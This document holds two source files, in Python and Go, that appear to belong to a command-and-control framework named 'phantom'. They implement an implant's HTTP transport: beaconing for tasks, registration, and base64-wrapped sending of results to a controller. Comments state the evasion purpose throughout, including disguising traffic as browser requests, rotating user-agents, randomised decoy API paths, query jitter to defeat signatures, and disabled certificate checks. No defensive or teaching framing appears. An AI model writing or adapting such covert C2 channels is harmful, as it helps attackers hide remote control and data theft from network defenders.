File: agents/python/transport/http.py
import base64
import json
import logging
import os
import random
import ssl
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid

log = logging.getLogger("phantom.transport.http")

# Rotate through common browser user-agents to blend with normal traffic
_USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
]

# Append random query params to each request so no two URLs are identical
_JITTER_PATHS = [
    "/api/v1/updates",
    "/api/v1/status",
    "/api/v1/config",
    "/api/v1/health",
    "/api/v1/sync",
]

_JITTER_PARAMS = [
    ("t", lambda: str(int(time.time()))),
    ("v", lambda: str(random.randint(1, 20))),
    ("check", lambda: random.choice(["true", "false"])),
    ("lang", lambda: random.choice(["en", "en-US", "en-GB"])),
    ("ref", lambda: uuid.uuid4().hex[:8]),
]


class HttpTransport:
    """C2 transport over HTTP(S) — disguises traffic as normal web requests."""

    def __init__(self, url: str, verify_ssl: bool = False,
                 proxy: str | None = None, user_agent: str | None = None,
                 headers: dict | None = None, timeout: float = 30.0,
                 retry_count: int = -1, retry_delay: float = 10.0,
                 ca_cert: str | None = None):
        self.base_url = url.rstrip("/")
        self.verify_ssl = verify_ssl
        self.proxy = proxy
        self.user_agent = user_agent
        self.timeout = timeout
        self.retry_count = retry_count
        self.retry_delay = retry_delay
        self.ca_cert = ca_cert
        self.extra_headers = headers or {}
        self.session_id: str | None = None
        self._connected = False
        self._ssl_ctx = self._build_ssl_context()
        self._opener = self._build_opener()

    @property
    def connected(self) -> bool:
        return self._connected

    def _build_ssl_context(self) -> ssl.SSLContext:
        ctx = ssl.create_default_context()
        if self.ca_cert and os.path.isfile(self.ca_cert):
            ctx.load_verify_locations(self.ca_cert)
        if not self.verify_ssl:
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
        return ctx

    def _build_opener(self) -> urllib.request.OpenerDirector:
        handlers: list = [urllib.request.HTTPSHandler(context=self._ssl_ctx)]
        proxy_url = self.proxy or os.environ.get("HTTPS_PROXY") or os.environ.get("HTTP_PROXY")
        if proxy_url:
            handlers.append(urllib.request.ProxyHandler({
                "http": proxy_url,
                "https": proxy_url,
            }))
        return urllib.request.build_opener(*handlers)

    def _get_headers(self) -> dict:
        # Pick a random user-agent each request to mimic diverse browser traffic
        ua = self.user_agent or random.choice(_USER_AGENTS)
        headers = {
            "User-Agent": ua,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,application/json,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.9",
            "Accept-Encoding": "gzip, deflate, br",
            "Connection": "keep-alive",
            "Referer": self.base_url + "/",
        }
        if self.session_id:
            headers["Cookie"] = f"PHPSESSID={self.session_id}"
        headers.update(self.extra_headers)
        return headers

    def _jitter_url(self, path: str = "") -> str:
        # Pick a random API path and append random query params for URL jitter
        if not path:
            path = random.choice(_JITTER_PATHS)
        params = {}
        for key, gen in random.sample(_JITTER_PARAMS, k=random.randint(1, 3)):
            params[key] = gen()
        qs = urllib.parse.urlencode(params)
        return f"{self.base_url}{path}?{qs}"

    def _do_request(self, url: str, data: bytes | None = None,
                    method: str | None = None) -> bytes | None:
        headers = self._get_headers()
        if data is not None:
            headers["Content-Type"] = "application/json"
        req = urllib.request.Request(url, data=data, headers=headers,
                                     method=method)
        try:
            resp = self._opener.open(req, timeout=self.timeout)
            return resp.read()
        except urllib.error.HTTPError as e:
            log.warning(f"HTTP {e.code}: {e.reason}")
            return None
        except (urllib.error.URLError, OSError) as e:
            log.warning(f"Request failed: {e}")
            return None

    def connect(self) -> bool:
        self.session_id = uuid.uuid4().hex[:16]
        attempts = 0
        while self.retry_count == -1 or attempts < self.retry_count:
            try:
                url = self._jitter_url("/api/v1/register")
                payload = json.dumps({
                    "data": base64.b64encode(b"register").decode(),
                    "id": self.session_id,
                }).encode()
                body = self._do_request(url, data=payload)
                if body is not None:
                    self._connected = True
                    log.info(f"Connected via HTTP to {self.base_url}")
                    return True
            except Exception as e:
                log.warning(f"Connect error: {e}")

            attempts += 1
            if self.retry_count != -1 and attempts >= self.retry_count:
                return False
            time.sleep(self.retry_delay)
        return False

    def send(self, data: bytes) -> bool:
        if not self._connected or not self.session_id:
            return False
        attempts = 0
        while self.retry_count == -1 or attempts < self.retry_count:
            url = self._jitter_url("/api/v1/response")
            payload = json.dumps({
                "data": base64.b64encode(data).decode(),
                "id": self.session_id,
            }).encode()
            body = self._do_request(url, data=payload)
            if body is not None:
                return True

            attempts += 1
            if self.retry_count != -1 and attempts >= self.retry_count:
                break
            time.sleep(self.retry_delay)

        log.error("Send failed after retries")
        self._connected = False
        return False

    def recv(self) -> bytes | None:
        if not self._connected or not self.session_id:
            return None
        url = self._jitter_url(f"/api/v1/beacon/{self.session_id}")
        body = self._do_request(url)
        if not body:
            return None
        try:
            msg = json.loads(body)
            encoded = msg.get("data")
            if not encoded:
                return None
            return base64.b64decode(encoded)
        except (json.JSONDecodeError, ValueError) as e:
            log.warning(f"Recv decode error: {e}")
            return None

    def disconnect(self):
        if self.session_id:
            url = self._jitter_url("/api/v1/register")
            payload = json.dumps({
                "data": base64.b64encode(b"disconnect").decode(),
                "id": self.session_id,
            }).encode()
            self._do_request(url, data=None, method="DELETE")
        self._connected = False
        self.session_id = None
        log.info("Disconnected from HTTP transport")

File: agents/go/transport/http.go
package transport

import (
	"bytes"
	"crypto/tls"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io"
	"math/rand"
	"net/http"
	"net/url"
	"sync"
	"time"
)

var userAgents = []string{
	"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36",
	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15",
	"Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
	"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
	"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 Chrome/119.0.0.0 Safari/537.36",
}

// HTTPTransport wraps C2 messages in HTTP requests for firewall evasion.
type HTTPTransport struct {
	baseURL    string
	sessionID  string
	client     *http.Client
	mu         sync.Mutex
	connected  bool
	recvBuf    []byte // buffered response from last send
	insecure   bool
}

func NewHTTPTransport(host string, port int, useTLS bool, insecure bool) *HTTPTransport {
	scheme := "http"
	if useTLS {
		scheme = "https"
	}
	baseURL := fmt.Sprintf("%s://%s:%d", scheme, host, port)

	t := &HTTPTransport{
		baseURL:  baseURL,
		insecure: insecure,
	}
	t.buildClient()
	return t
}

func (t *HTTPTransport) buildClient() {
	tlsConfig := &tls.Config{InsecureSkipVerify: t.insecure}
	transport := &http.Transport{
		TLSClientConfig: tlsConfig,
		Proxy:           http.ProxyFromEnvironment,
	}
	t.client = &http.Client{
		Transport: transport,
		Timeout:   30 * time.Second,
	}
}

func (t *HTTPTransport) Connect() error {
	t.mu.Lock()
	defer t.mu.Unlock()
	t.connected = true
	return nil
}

func (t *HTTPTransport) SetSessionID(sid string) {
	t.mu.Lock()
	defer t.mu.Unlock()
	t.sessionID = sid
}

// Send encodes the payload as base64 JSON and POSTs to the C2.
// The response body is buffered for the next Recv() call.
func (t *HTTPTransport) Send(data []byte) error {
	t.mu.Lock()
	defer t.mu.Unlock()

	if !t.connected {
		return fmt.Errorf("not connected")
	}

	// Determine endpoint from message type
	endpoint := t.resolveEndpoint(data)

	encoded := base64.StdEncoding.EncodeToString(data)
	wrapper := map[string]string{"data": encoded}
	body, err := json.Marshal(wrapper)
	if err != nil {
		return fmt.Errorf("marshal: %w", err)
	}

	reqURL := t.addJitter(t.baseURL + endpoint)
	req, err := http.NewRequest("POST", reqURL, bytes.NewReader(body))
	if err != nil {
		return fmt.Errorf("new request: %w", err)
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("User-Agent", userAgents[rand.Intn(len(userAgents))])

	resp, err := t.client.Do(req)
	if err != nil {
		t.connected = false
		return fmt.Errorf("http post: %w", err)
	}
	defer resp.Body.Close()

	respBody, err := io.ReadAll(resp.Body)
	if err != nil {
		return fmt.Errorf("read response: %w", err)
	}

	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
		return fmt.Errorf("http status %d: %s", resp.StatusCode, string(respBody))
	}

	t.recvBuf = respBody
	return nil
}

// Recv returns the buffered response from the last Send, or polls for tasks.
func (t *HTTPTransport) Recv() ([]byte, error) {
	t.mu.Lock()
	defer t.mu.Unlock()

	// If we have buffered data from a Send response, return it
	if len(t.recvBuf) > 0 {
		data := t.recvBuf
		t.recvBuf = nil
		return t.decodeResponse(data)
	}

	// Poll for tasks via beacon endpoint
	if t.sessionID == "" {
		return nil, fmt.Errorf("no session id for beacon")
	}

	endpoint := fmt.Sprintf("/api/v1/beacon/%s", t.sessionID)
	reqURL := t.addJitter(t.baseURL + endpoint)
	req, err := http.NewRequest("GET", reqURL, nil)
	if err != nil {
		return nil, fmt.Errorf("new request: %w", err)
	}
	req.Header.Set("User-Agent", userAgents[rand.Intn(len(userAgents))])

	resp, err := t.client.Do(req)
	if err != nil {
		t.connected = false
		return nil, fmt.Errorf("http get: %w", err)
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return nil, fmt.Errorf("read body: %w", err)
	}

	if resp.StatusCode == http.StatusNoContent || len(body) == 0 {
		return nil, nil // no tasks
	}

	return t.decodeResponse(body)
}

func (t *HTTPTransport) decodeResponse(data []byte) ([]byte, error) {
	var wrapper map[string]string
	if err := json.Unmarshal(data, &wrapper); err != nil {
		return data, nil // raw response, not wrapped
	}
	if encoded, ok := wrapper["data"]; ok {
		return base64.StdEncoding.DecodeString(encoded)
	}
	return data, nil
}

// resolveEndpoint determines the HTTP path based on the message type.
func (t *HTTPTransport) resolveEndpoint(data []byte) string {
	var msg struct {
		Type string `json:"type"`
	}
	if json.Unmarshal(data, &msg) == nil {
		switch msg.Type {
		case "register":
			return "/api/v1/register"
		case "response":
			return "/api/v1/response"
		}
	}
	return "/api/v1/response"
}

// addJitter appends a random query parameter to defeat caching/signatures.
func (t *HTTPTransport) addJitter(rawURL string) string {
	u, err := url.Parse(rawURL)
	if err != nil {
		return rawURL
	}
	q := u.Query()
	q.Set("_", fmt.Sprintf("%d", time.Now().UnixNano()+rand.Int63n(10000)))
	u.RawQuery = q.Encode()
	return u.String()
}

func (t *HTTPTransport) Disconnect() {
	t.mu.Lock()
	defer t.mu.Unlock()
	t.connected = false
}

func (t *HTTPTransport) Connected() bool {
	t.mu.Lock()
	defer t.mu.Unlock()
	return t.connected
}
